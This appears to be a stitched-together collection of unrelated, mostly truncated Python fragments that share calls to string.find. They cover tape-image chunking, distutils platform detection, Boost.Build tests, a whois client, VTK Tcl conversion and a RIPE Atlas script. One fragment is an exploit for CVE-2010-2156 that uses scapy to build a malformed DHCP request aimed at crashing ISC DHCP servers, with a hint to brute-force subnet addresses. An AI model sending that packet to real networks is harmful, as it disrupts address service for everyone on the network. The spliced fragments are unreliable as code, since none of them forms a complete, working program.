def create_chunks(file_names): """Traverse the list of filenames to insert, reading the relevant information, creating suitable chunks, and inserting them into the list of chunks.""" new_chunks = [] for name in file_names: # Find the .inf file and read the details stored within try: details = open(name + suffix + 'inf', 'r').readline() except IOError: try: details = open(name + suffix + 'INF', 'r').readline() except IOError: print("Couldn't open information file, %s" % name+suffix+'inf') sys.exit() # Parse the details details = [string.rstrip(details)] splitters = [' ', '\011'] # Split the details up where certain whitespace characters occur for s in splitters: new_details = [] # Split up each substring (list entry) for d in details: new_details = new_details + string.split(d, s) details = new_details # We should have details about the load and execution addresses # Open the file try: in_file = open(name, 'rb') except IOError: print("Couldn't open file, %s" % name) sys.exit() # Find the length of the file (don't rely on the .inf file) in_file.seek(0, 2) length = in_file.tell() in_file.seek(0, 0) # Examine the name entry and take the load and execution addresses dot_at = string.find(details[0], '.') if dot_at != -1: real_name = details[0][dot_at+1:] load, exe = details[1], details[2] else: real_name = get_leafname(name) load, exe = details[0], details[1] load = hex2num(load) exe = hex2num(exe) if load == None or exe == None: print('Problem with %s: information is possibly incorrect.' % name+suffix+'inf') sys.exit() # Reset the block number to zero block_number = 0 # Long gap gap = 1 # Write block details while True: block, last = write_block(in_file, real_name, load, exe, length, block_number) if gap == 1: new_chunks.append((0x110, number(2,0x05dc))) gap = 0 else: new_chunks.append((0x110, number(2,0x0258))) # Write the block to the list of new chunks # For old versions, just write the block if UEF_major == 0 and UEF_minor < 9: new_chunks.append((0x100, block)) else: new_chunks.append((0x100, block)) if last == 1: break # Increment the block number block_number = block_number + 1 # Close the input file in_file.close() # Write some finishing bytes to the list of new chunks # new_chunks.append((0x110, number(2,0x0258))) # new_chunks.append((0x112, number(2,0x0258))) # Return the list of new chunks return new_chunks
shobj_suffix = '.obj' shobj_prefix = '' lib_prefix = '' lib_suffix = '.lib' dll_prefix = '' dll_suffix = '.dll' elif sys.platform == 'cygwin': exe_suffix = '.exe' obj_suffix = '.o' shobj_suffix = '.os' shobj_prefix = '' lib_prefix = 'lib' lib_suffix = '.a' dll_prefix = '' dll_suffix = '.dll' elif string.find(sys.platform, 'irix') != -1: exe_suffix = '' obj_suffix = '.o' shobj_suffix = '.o' shobj_prefix = '' lib_prefix = 'lib' lib_suffix = '.a' dll_prefix = 'lib' dll_suffix = '.so' elif string.find(sys.platform, 'darwin') != -1: exe_suffix = '' obj_suffix = '.o' shobj_suffix = '.os' shobj_prefix = '' lib_prefix = 'lib' lib_suffix = '.a'
# But we do this only once, and it is fast enough f = open(fn) try: s = f.read() finally: f.close() except IOError, exc: # if we can't read this file, we cannot say it is wrong # the compiler will complain later about this file as missing return (CONFIG_H_UNCERTAIN, "couldn't read '%s': %s" % (fn, exc.strerror)) else: # "pyconfig.h" contains an "#ifdef __GNUC__" or something similar if string.find(s, "__GNUC__") >= 0: return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn) else: return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn) def get_versions(): """ Try to find out the versions of gcc, ld and dllwrap. If not possible it returns None for it. """ from distutils.version import LooseVersion from distutils.spawn import find_executable import re gcc_exe = find_executable('gcc') if gcc_exe:
print "Received start from Arduino" waypointNum = 0 # open the file for reading infile = open("geocaching.loc", "r") # if the line starts with <coord then pull out the numbers # example: <coord lat="40.005717" lon="-79.598867"/> # send the numbers to the arduino line = infile.readline().strip('\n\r') while line: line = infile.readline().strip('\n\r') if line[0:7] == "<coord ": startPos = string.find(line, '\"') + 1 endPos = string.find(line, '\"', startPos + 1) lat = float(line[startPos:endPos]) startPos2 = string.find(line, '\"', endPos + 1) + 1 endPos2 = string.find(line, '\"', startPos2 + 1) lon = float(line[startPos2:endPos2]) connection.write(str(waypointNum)) connection.write("=" + str(round(lat, 6)) + "," + str(round(lon, 6)) + '\n') waypointNum = waypointNum + 1 inChar = connection.read() if inChar != 'A': print "Ack missing?" # Close opened file infile.close()
def mkMsg(self): """create and write module level message for this class. Most of this is just compiling the info. meta in a dictionary of lists where each list is a list of tuples describing the tag lines for the particular section of the message. This tuple format conforms to that used by the xmlMessage class which is modeled on basic python argument passing, i.e. (key,*value,**attr). """ self.meta = {} self.meta['module']= [] self.meta['meta'] = [] self.meta['input'] = [] self.meta['output']= [] self.meta['errorlist'] = [] self.meta['module'].append(('module','name='+self.modName,'version='+__version__,'dataset='+self.obsName)) #instname = string.split(string.split(str(self))[0],'.')[1] self.meta['module'].append(('root',self.root)) #self.meta['module'].append(('instance', instname)) self.meta['meta'].append(('meta',)) self.meta['meta'].append(('depend',)) self.meta['meta'].append(('pkg',)) self.meta['meta'].append(('name','python')) self.meta['meta'].append(('version',pyversion.split()[0])) self.meta['meta'].append(('pkg',)) self.meta['meta'].append(('name','bpz')) bpzVersion = self._getBpzVersion() self.meta['meta'].append(('version',bpzVersion)) if self.errorList: self.meta['errorlist'].append(('errorlist',)) for pkg,err in self.errorList: self.meta['errorlist'].append(('erroritem',err,'frompkg='+pkg)) # input section self.meta['input'].append(('input',)) for f in self.inputList: if string.find(f,".xml") != -1: self.meta['input'].append(('file','type=text/xml')) self.meta['input'].append(('name',os.path.join("Catalogs",f))) else: self.meta['input'].append(('file','type=text/ascii')) self.meta['input'].append(('name',os.path.join("Catalogs",f))) # output section if self.outputList: self.meta['output'].append(('output',)) for f in self.outputList.keys(): if string.find(f,".xml") != -1: self.meta['output'].append(('file','type=text/xml')) self.meta['output'].append(('name',os.path.join("Catalogs",f))) for pred in self.outputList[f]: self.meta['output'].append(('predecessor',os.path.join("Catalogs",pred))) else: self.meta['output'].append(('file','type=text/ascii')) self.meta['output'].append(('name',os.path.join("Catalogs",f))) for pred in self.outputList[f]: self.meta['output'].append(('predecessor',os.path.join("Catalogs",pred))) # pass this dictionary to the class pMessage... msgFile = os.path.join(self.messagedir,self.modName+"_module.xml") mmsg = pMessage(self.meta) mmsg.writeMsg(msgFile) return
def get_platform (): """Return a string that identifies the current platform. This is used mainly to distinguish platform-specific build directories and platform-specific built distributions. Typically includes the OS name and version and the architecture (as supplied by 'os.uname()'), although the exact information included depends on the OS; eg. for IRIX the architecture isn't particularly important (IRIX only runs on SGI hardware), but for Linux the kernel version isn't particularly important. Examples of returned values: linux-i586 linux-alpha (?) solaris-2.6-sun4u irix-5.3 irix64-6.2 Windows will return one of: win-amd64 (64bit Windows on AMD64 (aka x86_64, Intel64, EM64T, etc) win-ia64 (64bit Windows on Itanium) win32 (all others - specifically, sys.platform is returned) For other non-POSIX platforms, currently just returns 'sys.platform'. """ if os.name == 'nt': # sniff sys.version for architecture. prefix = " bit (" i = string.find(sys.version, prefix) if i == -1: return sys.platform j = string.find(sys.version, ")", i) look = sys.version[i+len(prefix):j].lower() if look=='amd64': return 'win-amd64' if look=='itanium': return 'win-ia64' return sys.platform if os.name != "posix" or not hasattr(os, 'uname'): # XXX what about the architecture? NT is Intel or Alpha, # Mac OS is M68k or PPC, etc. return sys.platform # Try to distinguish various flavours of Unix (osname, host, release, version, machine) = os.uname() # Convert the OS name to lowercase, remove '/' characters # (to accommodate BSD/OS), and translate spaces (for "Power Macintosh") osname = string.lower(osname) osname = string.replace(osname, '/', '') machine = string.replace(machine, ' ', '_') machine = string.replace(machine, '/', '-') if osname[:5] == "linux": # At least on Linux/Intel, 'machine' is the processor -- # i386, etc. # XXX what about Alpha, SPARC, etc? return "%s-%s" % (osname, machine) elif osname[:5] == "sunos": if release[0] >= "5": # SunOS 5 == Solaris 2 osname = "solaris" release = "%d.%s" % (int(release[0]) - 3, release[2:]) # fall through to standard osname-release-machine representation elif osname[:4] == "irix": # could be "irix64"! return "%s-%s" % (osname, release) elif osname[:3] == "aix": return "%s-%s.%s" % (osname, version, release) elif osname[:6] == "cygwin": osname = "cygwin" rel_re = re.compile (r'[\d.]+') m = rel_re.match(release) if m: release = m.group() elif osname[:6] == "darwin": # # For our purposes, we'll assume that the system version from # distutils' perspective is what MACOSX_DEPLOYMENT_TARGET is set # to. This makes the compatibility story a bit more sane because the # machine is going to compile and link as if it were # MACOSX_DEPLOYMENT_TARGET. from distutils.sysconfig import get_config_vars cfgvars = get_config_vars() macver = os.environ.get('MACOSX_DEPLOYMENT_TARGET') if not macver: macver = cfgvars.get('MACOSX_DEPLOYMENT_TARGET') if 1: # Always calculate the release of the running machine, # needed to determine if we can build fat binaries or not. macrelease = macver # Get the system version. Reading this plist is a documented # way to get the system version (see the documentation for # the Gestalt Manager) try: f = open('/System/Library/CoreServices/SystemVersion.plist') except IOError: # We're on a plain darwin box, fall back to the default # behaviour. pass else: try: m = re.search( r'<key>ProductUserVisibleVersion</key>\s*' + r'<string>(.*?)</string>', f.read()) if m is not None: macrelease = '.'.join(m.group(1).split('.')[:2]) # else: fall back to the default behaviour finally: f.close() if not macver: macver = macrelease if macver: from distutils.sysconfig import get_config_vars release = macver osname = "macosx" if (macrelease + '.') >= '10.4.' and \ '-arch' in get_config_vars().get('CFLAGS', '').strip(): # The universal build will build fat binaries, but not on # systems before 10.4 # # Try to detect 4-way universal builds, those have machine-type # 'universal' instead of 'fat'. machine = 'fat' cflags = get_config_vars().get('CFLAGS') archs = re.findall('-arch\s+(\S+)', cflags) archs = tuple(sorted(set(archs))) if len(archs) == 1: machine = archs[0] elif archs == ('i386', 'ppc'): machine = 'fat' elif archs == ('i386', 'x86_64'): machine = 'intel' elif archs == ('i386', 'ppc', 'x86_64'): machine = 'fat3' elif archs == ('ppc64', 'x86_64'): machine = 'fat64' elif archs == ('i386', 'ppc', 'ppc64', 'x86_64'): machine = 'universal' else: raise ValueError( "Don't know machine value for archs=%r"%(archs,)) elif machine == 'i386': # On OSX the machine type returned by uname is always the # 32-bit variant, even if the executable architecture is # the 64-bit variant if sys.maxint >= 2**32: machine = 'x86_64' elif machine in ('PowerPC', 'Power_Macintosh'): # Pick a sane name for the PPC architecture. machine = 'ppc' # See 'i386' case if sys.maxint >= 2**32: machine = 'ppc64' return "%s-%s-%s" % (osname, release, machine)
dir = os.getcwd() filelist = dirEntries(dir, True, 'py') search_file = 'Mayavi_PhaseIso.py' length = len(search_file) for file0 in filelist: file_len = len(file0) thing = file0[file_len - length:file_len] check = (thing == search_file) if string.find(file0, search_file) != -1: print file0 cdir = file0[0:len(file0) - length] print cdir # s2 = "os.listdir('" + cdir + "'):" s3 = "os.listdir('.'):" # replaceAll(file0, s3, s2) # # s6 = "dir=os.getcwd()" s7 = "dir='" + cdir + "'" replaceAll(file0, s6, s7)
jobStuff['stdout'] = os.path.join( scriptOut, os.path.basename(script)) + '.o' + str( jobStuff['number']) jobStuff['stderr'] = os.path.join( scriptErr, os.path.basename(script)) + '.e' + str( jobStuff['number']) jobStuff['command'] = command jobStuff['type'] = 'proc2' jobStuff['message'] = val jobStuff['date'] = str(datetime.datetime.now()) doc['batchJob'].append(jobStuff) proc = {} proc['batchjob'] = jobStuff['number'] doc['proc2'] = proc db.save_doc(doc) if __name__ == '__main__': myargs = [] mykwargs = {} for arg in sys.argv[1:]: if string.find(arg, '=') == -1: myargs.append(arg) else: mykwargs[arg.split('=')[0]] = arg.split('=')[1] main(*myargs, **mykwargs)
def parse_methods(self, vtk_obj): "Parse for the methods." debug("VtkPrintMethodParser:: parse_methods()") if self._initialize_methods(vtk_obj): # if David Gobbi's improvements are in this version of VTK # then I need to go no further. return for method in self.methods[:]: # removing methods that have nothing to the right of the ':' if (method[1] == '') or \ (string.find (method[1], "none") > -1) : self.methods.remove(method) for method in self.methods: # toggle methods are first identified if (method[1] == "On") or (method[1] == "Off"): try: val = eval("vtk_obj.Get%s ()" % method[0]) if val == 1: eval("vtk_obj.%sOn ()" % method[0]) elif val == 0: eval("vtk_obj.%sOff ()" % method[0]) except AttributeError: pass else: self.toggle_meths.append(method[0] + "On") else: # see it it is get_set or get or a state method found = 0 # checking if it is a state func. # figure out the long names from the dir_state_meths for sms in self.dir_state_meths[:]: if string.find(sms[0], method[0]) >= 0: self.state_meths.append(sms) self.dir_state_meths.remove(sms) found = 1 if found: self.get_meths.append("Get" + method[0]) try: t = eval("vtk_obj.Get%sAsString ()" % method[0]) except AttributeError: pass else: self.get_meths.append("Get" + method[0] + "AsString") else: # the long name is inherited or it is not a state method try: t = eval("vtk_obj.Get%s ().GetClassName ()" % method[0]) except AttributeError: pass else: continue val = 0 try: val = eval("vtk_obj.Get%s ()" % method[0]) except (TypeError, AttributeError): pass else: try: f = eval("vtk_obj.Set%s" % method[0]) except AttributeError: self.get_meths.append("Get" + method[0]) else: try: apply(f, val) except TypeError: try: apply(f, (val, )) except TypeError: self.get_meths.append("Get" + method[0]) else: self.get_set_meths.append(method[0]) else: self.get_set_meths.append(method[0]) self._clean_up_methods(vtk_obj)
"jamfile.jam", """ exe a : a_empty.cpp : <variant>debug <define>FOO <include>BAR ; exe a : a.cpp : <variant>release ; """) t.rm("bin/$toolset/release/a.exe") t.run_build_system("release define=FOO") t.expect_addition("bin/$toolset/release/a.exe") # Test that ambiguity is reported correctly. t.write("jamfile.jam", """ exe a : a_empty.cpp ; exe a : a.cpp ; """) t.run_build_system("--no-error-backtrace", status=None) t.fail_test(string.find(t.stdout(), "No best alternative") == -1) # Another ambiguity test: two matches properties in one alternative are neither # better nor worse than a single one in another alternative. t.write( "jamfile.jam", """ exe a : a_empty.cpp : <optimization>off <profiling>off ; exe a : a.cpp : <debug-symbols>on ; """) t.run_build_system("--no-error-backtrace", status=None) t.fail_test(string.find(t.stdout(), "No best alternative") == -1) # Test that we can have alternative without sources. t.write( "jamfile.jam", """
class WhoisRecord: defaultserver = 'whois.verisign-grs.net' #'whois.networksolutions.com' whoismap={ 'com' : 'whois.internic.net' , \ 'org' : 'whois.pir.org' , \ 'net' : 'whois.internic.net' , \ 'edu' : 'whois.networksolutions.com' , \ 'biz' : 'whois.biz' , \ 'info': 'whois.afilias.info' , \ 'us' : 'whois.nic.us', \ 'de' : 'whois.denic.de' , \ 'gov' : 'whois.nic.gov' , \ 'name': 'whois.nic.name' , \ #??? 'pro': 'whois.nic.name' , \ 'museum': 'whois.museum' , \ 'int': 'whois.iana.org' , \ 'aero': 'whois.information.aero' , \ 'coop': 'whois.nic.coop' , \ # See http://www.nic.gov/cgi-bin/whois 'mil' : 'whois.nic.mil' , \ # See http://www.nic.mil/cgi-bin/whois 'ca' : 'whois.cdnnet.ca' , \ 'uk' : 'whois.nic.uk' , \ 'au' : 'whois.aunic.net' , \ 'hu' : 'whois.nic.hu' , \ # All the following are unverified/checked. 'be' : 'whois.ripe.net', 'it' : 'whois.ripe.net' , \ # also whois.nic.it 'at' : 'whois.ripe.net' , \ # also www.nic.at, whois.aco.net 'dk' : 'whois.ripe.net' , \ 'fo' : 'whois.ripe.net' , \ 'lt' : 'whois.ripe.net' , \ 'no' : 'whois.ripe.net' , \ 'sj' : 'whois.ripe.net' , \ 'sk' : 'whois.ripe.net' , \ 'tr' : 'whois.ripe.net' , \ # also whois.metu.edu.tr 'il' : 'whois.ripe.net' , \ 'bv' : 'whois.ripe.net' , \ 'se' : 'whois.nic-se.se' , \ 'br' : 'whois.nic.br' , \ # a.k.a. whois.fapesp.br? 'fr' : 'whois.nic.fr' , \ 'sg' : 'whois.nic.net.sg' , \ 'hm' : 'whois.registry.hm' , \ # see also whois.nic.hm 'nz' : 'domainz.waikato.ac.nz' , \ 'nl' : 'whois.domain-registry.nl' , \ # RIPE also handles other countries # See http://www.ripe.net/info/ncc/rir-areas.html 'ru' : 'whois.ripn.net' , \ 'ch' : 'whois.nic.ch' , \ # see http://www.nic.ch/whois_readme.html 'jp' : 'whois.nic.ad.jp' , \ # (use DOM foo.jp/e for english; need to lookup !handles separately) 'to' : 'whois.tonic.to' , \ 'nu' : 'whois.nic.nu' , \ 'fm' : 'www.dot.fm' , \ # http request http://www.dot.fm/search.html 'am' : 'whois.nic.am' , \ 'nu' : 'www.nunames.nu' , \ # http request # e.g. http://www.nunames.nu/cgi-bin/drill.cfm?domainname=nunames.nu #'cx' : 'whois.nic.cx' , \ # no response from this server 'af' : 'whois.nic.af' , \ 'as' : 'whois.nic.as' , \ 'li' : 'whois.nic.li' , \ 'lk' : 'whois.nic.lk' , \ 'mx' : 'whois.nic.mx' , \ 'pw' : 'whois.nic.pw' , \ 'sh' : 'whois.nic.sh' , \ # consistently resets connection 'tj' : 'whois.nic.tj' , \ 'tm' : 'whois.nic.tm' , \ 'pt' : 'whois.dns.pt' , \ 'kr' : 'whois.nic.or.kr' , \ # see also whois.krnic.net 'kz' : 'whois.nic.or.kr' , \ # see also whois.krnic.net 'al' : 'whois.ripe.net' , \ 'az' : 'whois.ripe.net' , \ 'ba' : 'whois.ripe.net' , \ 'bg' : 'whois.ripe.net' , \ 'by' : 'whois.ripe.net' , \ 'cy' : 'whois.ripe.net' , \ 'cz' : 'whois.ripe.net' , \ 'dz' : 'whois.ripe.net' , \ 'ee' : 'whois.ripe.net' , \ 'eg' : 'whois.ripe.net' , \ 'es' : 'whois.ripe.net' , \ 'fi' : 'whois.ripe.net' , \ 'gr' : 'whois.ripe.net' , \ 'hr' : 'whois.ripe.net' , \ 'lu' : 'whois.ripe.net' , \ 'lv' : 'whois.ripe.net' , \ 'ma' : 'whois.ripe.net' , \ 'md' : 'whois.ripe.net' , \ 'mk' : 'whois.ripe.net' , \ 'mt' : 'whois.ripe.net' , \ 'pl' : 'whois.ripe.net' , \ 'ro' : 'whois.ripe.net' , \ 'si' : 'whois.ripe.net' , \ 'sm' : 'whois.ripe.net' , \ 'su' : 'whois.ripe.net' , \ 'tn' : 'whois.ripe.net' , \ 'ua' : 'whois.ripe.net' , \ 'va' : 'whois.ripe.net' , \ 'yu' : 'whois.ripe.net' , \ # unchecked 'ac' : 'whois.nic.ac' , \ 'cc' : 'whois.nic.cc' , \ #'cn' : 'whois.cnnic.cn' , \ # connection refused 'gs' : 'whois.adamsnames.tc' , \ 'hk' : 'whois.apnic.net' , \ #'ie' : 'whois.ucd.ie' , \ # connection refused #'is' : 'whois.isnet.is' , \# connection refused #'mm' : 'whois.nic.mm' , \ # connection refused 'ms' : 'whois.adamsnames.tc' , \ 'my' : 'whois.mynic.net' , \ #'pe' : 'whois.rcp.net.pe' , \ # connection refused 'st' : 'whois.nic.st' , \ 'tc' : 'whois.adamsnames.tc' , \ 'tf' : 'whois.adamsnames.tc' , \ 'th' : 'whois.thnic.net' , \ 'tw' : 'whois.twnic.net' , \ # 'us' : 'whois.isi.edu' , \ 'vg' : 'whois.adamsnames.tc' , \ #'za' : 'whois.co.za' # connection refused } def __init__(self, domain=None): self.domain = domain self.whoisserver = None self.page = None def whois(self, domain=None, server=None, cache=0): if domain is not None: self.domain = domain if server is not None: self.whoisserver = server if self.domain is None: print "No Domain" raise "No Domain" if self.whoisserver is None: self.chooseserver() if self.whoisserver is None: print "No Server" raise "No Server" if cache: fn = "%s.dom" % domainname if os.path.exists(fn): return open(fn).read() self.page = self._whois() if cache: open(fn, "w").write(page) def chooseserver(self): try: toplevel = string.split(self.domain, ".")[-1] self.whoisserver = WhoisRecord.whoismap.get(toplevel) #print toplevel, "---", self.whoisserver if self.whoisserver == None: self.whoisserver = WhoisRecord.defaultserver return except: self.whoisserver = WhoisRecord.defaultserver return if toplevel in ('com', 'org', 'net'): tmp = self._whois() m = re.search("Whois Server:(.+)", tmp) if m: self.whoisserver = string.strip(m.group(1)) #print "server 2:", self.whoisserver return self.whoisserver = 'whois.networksolutions.com' tmp = self._whois() m = re.search("Whois Server:(.+)", tmp) if m: self.whoisserver = string.strip(m.group(1)) #print "server 1:", self.whoisserver return #print "server 3:", self.whoisserver def _whois(self): def alrmhandler(signum, frame): raise "TimedOut", "on connect" s = None ## try until we timeout s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if HAS_ALARM: s.setblocking(0) signal.signal(signal.SIGALRM, alrmhandler) signal.alarm(timeout) while 1: try: s.connect((self.whoisserver, 43)) except socket.error, (ecode, reason): if ecode == errno.EINPROGRESS: continue elif ecode == errno.EALREADY: continue else: raise socket.error, (ecode, reason) pass break if HAS_ALARM: signal.alarm(0) ret = select.select([s], [s], [], 30) if len(ret[1]) == 0 and len(ret[0]) == 0: s.close() raise TimedOut, "on data" s.setblocking(1) s.send("%s\n" % self.domain) page = "" while 1: data = s.recv(8196) if not data: break page = page + data pass s.close() if string.find(page, "No match for") != -1: raise 'NoSuchDomain', self.domain if string.find(page, "No entries found") != -1: raise 'NoSuchDomain', self.domain if string.find(page, "no domain specified") != -1: raise 'NoSuchDomain', self.domain if string.find(page, "NO MATCH:") != -1: raise 'NoSuchDomain', self.domain return page
if area is not None or country is not None or asn is not None: usage("Specify country *or* area *or* ASn *or* old measurement") sys.exit(1) data["probes"][0]["requested"] = 1000 # Dummy value, anyway, # but necessary to get # all the probes # TODO: the huge value of "requested" makes us wait a very long time data["probes"][0]["type"] = "msm" data["probes"][0]["value"] = old_measurement data["definitions"][0]["description"] += ( " from probes of measurement #%s" % old_measurement) else: data["probes"][0]["type"] = "area" data["probes"][0]["value"] = "WW" if string.find(target, ':') > -1: af = 6 else: af = 4 data["definitions"][0]['af'] = af if measurement_id is None: if verbose: print data measurement = RIPEAtlas.Measurement(data) print "Measurement #%s %s uses %i probes" % ( measurement.id, data["definitions"][0]["description"], measurement.num_probes) rdata = measurement.results(wait=True, percentage_required=percentage_required)
t.expect_addition("bin/$toolset/debug/main.exe") t.rm(["bin", "a/bin", "b/bin"]) # Test that putting a library in sources of a searched library works. t.write("jamfile.jam", """\ exe main : main.cpp png ; lib png : z : <name>png ; lib z : : <name>zzz ; """) t.run_build_system(["-a", "-d+2"], status=None, stderr=None) # Try to find the "zzz" string either in response file (for Windows compilers), # or in the standard output. rsp = t.adjust_names("bin/$toolset/debug/main.exe.rsp")[0] if os.path.exists(rsp) and (string.find(open(rsp).read(), "zzz") != -1): pass elif string.find(t.stdout(), "zzz") != -1: pass else: t.fail_test(1) # Test main -> libb -> liba chain in the case where liba is a file and not a # Boost.Build target. t.rm(".") t.write("jamroot.jam", "") t.write("a/jamfile.jam", """\ lib a : a.cpp ; install dist : a ; """)
import string from template_typedef_cplx import * # # double case # try: d = make_Identity_double() a = d.this except: print d, "is not an instance" raise RuntimeError s = string.split('%s' % d)[1] if string.find(s, 'ArithUnaryFunction') == -1: print d, "is not an ArithUnaryFunction" raise RuntimeError try: e = make_Multiplies_double_double_double_double(d, d) a = e.this except: print e, "is not an instance" raise RuntimeError s = string.split('%s' % e)[1] if string.find(s, 'ArithUnaryFunction') == -1: print e, "is not an ArithUnaryFunction" raise RuntimeError
# Version: 4.0.x, 4.1.x, 4.2.x # CVE: cve-2010-2156 # ps: is possible make a bruteforce on subnet ip address to find a correct value. # import sys import string if len(sys.argv) is 1: print("Usage: " + sys.argv[0] + "-ip=<legal ip in subnet>") print("Example: " + sys.argv[0] + " -ip=192.168.1.100") sys.exit(0) for i in range(len(sys.argv)): if string.find(sys.argv[i],"-ip") is 0: globals()['ip'] = sys.argv[i].split('=')[1] from scapy.all import * globals()['verbose'] = 2 def msg(string, level): if globals()['verbose'] >= level: print(string) msg("attack...",2) p=(Ether(src="aa:aa:aa:aa:aa:aa",dst="ff:ff:ff:ff:ff:ff")/IP(dst="255.255.255.255")/UDP(sport=68,dport=67)/ BOOTP(ciaddr=globals()['ip'],chaddr="\xaa\xaa\xaa\xaa\xaa\xaa")/ DHCP(options=[("message-type","request"),("client_id",""),("end")]))
def Add(self, name, sidebar=None): self.number += 1 self.names[name] = self.number self.pages[self.number] = Element() element = self.pages[self.number] self.page = element element.name = name element.redraw = True element.tab = self.AddTab(name) # structure # +---+------------------+ # |+--++----------------+| # || || || # || || || # || || || # || || || # |+--++----------------+| # +----------------------+ element.hframe = TGHorizontalFrame(element.tab, 1, 1) element.tab.AddFrame(element.hframe, TOP_X_Y) # check for menu items if sidebar: element.sidebar = TGVerticalFrame(element.hframe, 1, 1) element.hframe.AddFrame(element.sidebar, TOP_LEFT) for code in sidebar: exec(code) element.display = TGHorizontalFrame(element.hframe, 1, 1) element.hframe.AddFrame(element.display, TOP_X_Y) from string import upper standardCanvas = find(upper(name), '3D') < 0 if standardCanvas: # set up a regular ROOT canvas if find(upper(name), 'LEGO') > -1: element.ecanvas \ = TRootEmbeddedGLCanvas("c%s" % name, element.display, self.width, self.height) else: element.ecanvas = TRootEmbeddedCanvas("c%s" % name, element.display, self.width, self.height) element.canvas = element.ecanvas.GetCanvas() element.display.AddFrame(element.ecanvas, TOP_X_Y) else: # set up a canvas that can handle 3D displays element.viewer = TGLEmbeddedViewer(element.display) element.display.AddFrame(element.viewer.GetFrame(), TOP_X_Y) # set sky blue background color bkg = element.viewer.ColorSet().Background() bkg.SetColor(SKYBLUE[0], SKYBLUE[1], SKYBLUE[2]) # draw axes root.DrawAxes(element.viewer) # we want our own simplified gui #TEveManager.Create(kFALSE, 'l') TEveManager.Create(kFALSE) element.canvas = TEveViewer("Viewer") element.canvas.SetGLViewer(element.viewer, element.viewer.GetFrame()) element.canvas.AddScene(gEve.GetEventScene()) gEve.GetViewers().AddElement(element.canvas) element.shapes = [] element.fixedelements = TEveElementList("fixed") element.elements = TEveElementList("transients") gEve.AddElement(element.fixedelements) gEve.AddElement(element.elements)
def replace_indef(l, indef): for i in range(len(l)): while string.find(l[i], "INDEF") > -1: idx = string.find(l[i], "INDEF") l[i] = l[i][:idx] + indef + l[i][idx + 5:] return l
def processLine(line, output, keepTcl=1): line = string.strip(line) + "\n" if line[0] == '#': output.write(line) elif line[:15] == 'package require': if keepTcl == 1: output.write('# ' + line) elif string.find(line, "deiconify") > -1: output.write('# ' + line) else: if keepTcl == 1: output.write('#' + line) if string.find(line, 'expr') > -1: match = re.search("\[\s*expr ([^\]]+)\]", line).groups()[0] match = re.sub('\s+', '', match) line = re.sub("\[\s*expr ([^\]]+)\]", match, line) line = re.sub('\[', '', line) line = re.sub('\]', '', line) line = re.sub('ren1', 'ren', line) line = re.sub(';', '\n', line) line = re.sub('\$', '', line) line = re.sub('{', ' ', line) line = re.sub('}', ' ', line) n = len(line) keys = string.split(line) # handle set keyword. inSet = 0 if len(keys) and keys[0] == 'set': output.write(keys[1] + ' = ') keys = keys[2:] inSet = 1 keysLength = len(keys) inaModule = 0 inaForLoop = 0 if keysLength == 0: output.write(line) # Catch some tcl-specific keywords and comment out elif keys[0] == 'proc': inaModule = 0 output.write('def ' + keys[1] + '(') if len(keys) > 2: output.write(keys[2]) for i in range(3, len(keys)): output.write(', ' + keys[i]) output.write('):\n') elif keys[0] == 'catch': output.write('#' + line) elif keys[0] == 'source': output.write('#' + line) if re.search("colors.tcl", line) > -1: output.write("from colors import *") elif keys[0] == 'wm': output.write('#' + line) elif keysLength > 1 and keys[1] == 'SetUserMethod': if keepTcl == 1: output.write('#' + line) elif keys[0] == 'for' and keys[1] == 'set': inaForLoop = 1 #print '...Handling for loop' output.write("for " + keys[2] + " in range(" + keys[3] + ", ") upper = keys[6] if keys[5] == "<=": output.write(upper + "+1):\n") else: output.write(upper + "):\n") # Detect vtk class instance; Pythonize it. elif line[:3] == 'vtk': output.write(keys[1] + ' = vtk.' + keys[0] + '()\n') else: lparen = 0 finishedFlag = 0 # for i in range(len(keys)-1): for i in range(len(keys)): ls = len(keys[i]) if keys[i] == 'eval': continue # continuation mark elif keys[i] == '\\': output.write(" \\\n") elif keys[i][-8:] == 'FileName': if keys[i + 1][0:1] == '"': f_name = re.sub('"VTK_DATA_ROOT/', \ 'VTK_DATA_ROOT + "/', keys[i+1]) output.write(keys[i] + "(" + f_name + ")") else: f_name = re.sub('VTK_DATA_ROOT/', \ 'VTK_DATA_ROOT + "/', keys[i+1]) if f_name[:13] == 'VTK_DATA_ROOT': output.write(keys[i] + "(" + f_name + "\")") else: output.write(keys[i] + "(\"" + keys[i + 1] + "\")") finishedFlag = 1 break elif keys[i] == 'SetColor': #print '...doing SetColor' #print keys if not re.search('[-\d.]', keys[i + 1][0:1]): #print '...got a named color' color = keys[i + 1][0:] #print 'color = ' + color output.write( "SetColor(" + color+"[0]," + \ color+"[1]," + color+"[2])" ) else: output.write("SetColor(" + keys[i + 1] + ", " + keys[i + 2] + ", " + keys[i + 3] + ")") finishedFlag = 1 break elif keys[i][:3] == 'Set' or keys[i][:3] == 'Add' or keys[ i][:6] == 'Insert': output.write(keys[i] + '(') lparen = 1 elif i < len(keys)-1 and \ re.search('[-\d.]', keys[i+1][0:1]) and \ not re.search('[-\d.]', keys[i][ls-1:ls]): output.write(keys[i] + '(') lparen = 1 elif keys[i][:3] == 'Get': output.write(keys[i] + '()') if i < len(keys) - 1: output.write('.') else: if i < len(keys) - 1: npos = re.search("[-\d.]", keys[i][0:1]) if npos > -1 or keys[i][0:3] == 'VTK': output.write(keys[i] + ', ') else: output.write(keys[i] + '.') else: if inaModule == 1: output.write('\t') output.write(keys[i]) if finishedFlag == 0: if keys[-1][:3] != 'Get' and \ (not re.search("[-+\d.]", keys[-1])): if lparen == 0: output.write('(') lparen = 1 else: output.write('\n') # Terminating right paren. #output.write( ')\n' ) if lparen == 1: output.write(')\n') if inSet == 1: output.write('\n')
